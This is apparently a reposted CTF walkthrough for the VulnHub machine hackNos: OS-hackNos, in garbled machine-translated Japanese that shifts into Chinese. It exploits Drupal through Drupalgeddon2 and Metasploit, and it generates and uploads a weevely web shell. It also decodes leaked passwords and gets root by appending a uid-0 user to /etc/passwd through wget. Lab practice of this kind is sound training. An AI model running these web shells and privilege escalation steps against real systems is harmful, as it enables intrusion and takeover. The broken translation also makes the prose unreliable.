第48号 - VulnHub-hackNos:OS-hackNos-チュートリアル浸透研究

**

VulnHub-hackNos:OS-hackNos-チュートリアル

**

ドローンアドレスします。https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
ドローン難易度:中級(CTF) -私はそれが行わ主だと思います!
ドローン日:2019年11月27日
ドローン説明:
難易度:中級への簡単な
フラグ:フラグ2、第1のユーザと第2、ルート
学習:エクスプロイト|アプリケーションのWeb |列挙型|権限昇格の
ウェブサイト:www.hackNos.com
メール:ビジネスカード@ hackNos.com
著者:太夫の
時間:2020年2月8日
注:これらのすべてのコンピュータに対して、私は、VMwareを実行しているコンピュータを使用してダウンロードしました。私は、攻撃者のマシンCTFに対する解決策として、カーリーのLinuxを使用します。ここだけの教育目的のために学習するための技術の使用は、技術は他の目的のためにリストされている場合、私は責任を負いかねます。

まず、情報収集

ここに画像を挿入説明
私たちは、宛先IPアドレスを取得するために、VMのIPアドレスに使用nmapのを標的を同定する必要があります:
ここに画像を挿入説明
私たちは、CTFのターゲットコンピュータのIPアドレスを見つけた:192.168.56.143を
ここに画像を挿入説明
開いているポート22、80を見つけるNMAP ...
ここに画像を挿入説明
80はapache2の参照するには爆発です...一見...
ここに画像を挿入説明
Drupalの発見...
ここに画像を挿入説明
ここに(Droopescanは、プラグインスキャナに基づいており、缶のヘルプセキュリティ研究者は、Drupalの、SilverStripe、Wordpressの、Joomlaの(列挙し、バージョン情報利用できるURLアドレス)とのMoodleの問題を発見したDroopescanスキャンを使用)
ここでは、当然のことながら、またdirbusterなど、使用DIRBすることができ、より良いDroopescan drupalの...のためのインストールと接続
ここに画像を挿入説明

第二に、言及する権利

方法1:

drupal7.57バージョン...
二つの方法で:MSFの直接の使用、Pythonスクリプトを利用し...
ここに画像を挿入説明
MSFのカーネルが直接シェルを取得...

方法2:

ここに画像を挿入説明
コマンド:git clone https://github.com/dreadlocked/Drupalgeddon2.git
最初のダウンロードgithubの上のEXPあなたは私とエラー好きなら...、あなたがダウンロードする必要がgem install highline実行する前にEXPので、プリインストールされたパッケージのハイラインに依存する必要...の図を参照
ここに画像を挿入説明
ここに画像を挿入説明
に成功WWW-データ権限を、しかし、TTYを使用する必要があり、ここで取得したいですトロイの木馬のツール...
ここに画像を挿入説明
コマンド:weevely generate cmd ./xiaoma.php
トロイの木馬を作成し、アップロード...アップに...
ここに画像を挿入説明
ここに画像を挿入説明
コマンド:weevely http://192.168.56.143/drupal/xiaoma.php cmd
成功...

方法3:

直接在链接下载py,利用python3即可提权…https://www.exploit-db.com/exploits/44448
python3 -c ‘import pty; pty.spawn("/bin/bash")’ 获得TTY…不演示了…
1
1
ここに画像を挿入説明
成功获得user…
ここに画像を挿入説明
在html页面目录发现了alexander.txt…
ここに画像を挿入説明
一看就知道base64编码,解码…
这是brainfuck加密后的字符串…解码…
ここに画像を挿入説明
解码链接
james:Hacker@4514
我尝试在数据库看看能不能也找到密码…试试
ここに画像を挿入説明
发现数据库用户密码:cuppauser、Akrn@4514
ここに画像を挿入説明
这儿也能看到,但是无法解析…跳过
命令:find / -perm -u=s -type f 2>/dev/null
ここに画像を挿入説明
这里可以wget和sudo,但是sudo -l 需要密码…这里直接利用wget替换本地的passwd即可提权root…试试
ここに画像を挿入説明
命令:openssl passwd -1 -salt dayu dayu
命令:echo 'dayu:$1$dayu$/Cg/PH1Ew3w37.fLDfjX8/:0:0:root:/root:/bin/bash' >> /etc/passwd
在本地生成root权限用户dayu…开启本地服务
ここに画像を挿入説明
提权即可…
ここに画像を挿入説明
成功获得root权限并查看两个flag…

当然方法很多种,千变万化,理解原理即可!!!加油!!!

由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

ここに画像を挿入説明

公開された54元の記事 ウォンの賞賛9 ビュー10000 +

おすすめ

転載: blog.csdn.net/qq_34801745/article/details/104222586